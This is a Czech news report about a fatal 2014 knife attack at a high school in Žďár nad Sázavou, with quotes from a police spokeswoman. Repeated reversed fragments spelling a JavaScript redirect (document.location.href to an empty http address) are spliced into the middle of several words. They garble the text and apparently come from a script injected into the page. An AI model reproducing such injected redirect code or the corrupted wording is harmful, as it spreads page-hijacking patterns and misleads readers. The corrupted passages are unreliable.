žena, útok, student
Rainbow page separator

Žena pobodala studenty ve škole, šestnáctiletý chlapec zemřel

Úterý, 14. října 2014

Napadení studentů ve Žďáře nad Sázavou

Žďár nad Sázavou / K násilnému trestnému činu došlo v úterý před půl osmou ráno ve žďárské střední obchodní škole. Šestadvacetiletá pachatelka z Ostravska ve škole nožem zaú[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];točila na několik studentů. Šestnáctiletý chlapec, který se snažil pomoci svojí spolužačce, utrpěl při napadení zranění, jemuž na místě podlehl. Pachatelka zranila také dvě studentky, se kterými zůstala v šatnách.

„Na mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to okamžitě vyjely všechny dostupné policejní hlídky. Byla vyžádána rovněž pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost policejního vyjednavače a vzhledem k závažnosti a povaze ú[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toku, kdy se pachatelka nacházela ještě stále ve škole, byla na mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vyslána zásahová jednotka,“ uvedla policejní mluvčí Jana Kroutilová.
Policisté okamžitě školu a její okolí zabezpečili. Komunikaci s pachatelkou navázal policejní vyjednavač, kterému se podařilo vyjednat, aby mohli zdravotníci ošetřit jednu ze zraněných studentek. Vyjednavač poté pokračoval v komunikaci s nebezpečnou pachatelkou a snažil se zachránit druhou dívku. „V té době provedli policisté přivolané zásahové jednotky zákrok a ozbrojenou ženu zadrželi. Zranění utrpěla i druhá studentka a při ochraně jejího života byl pachatelkou zraněn také policejní vyjednavač,“ uvedla mluvčí s tím, že agresorka skončila v policejní cele.
Obě zraněné dívky i policista byli převezeni do novoměstské nemocnice, případ kriminalisté dále vyšetřují.

Prohlášení Policie České republiky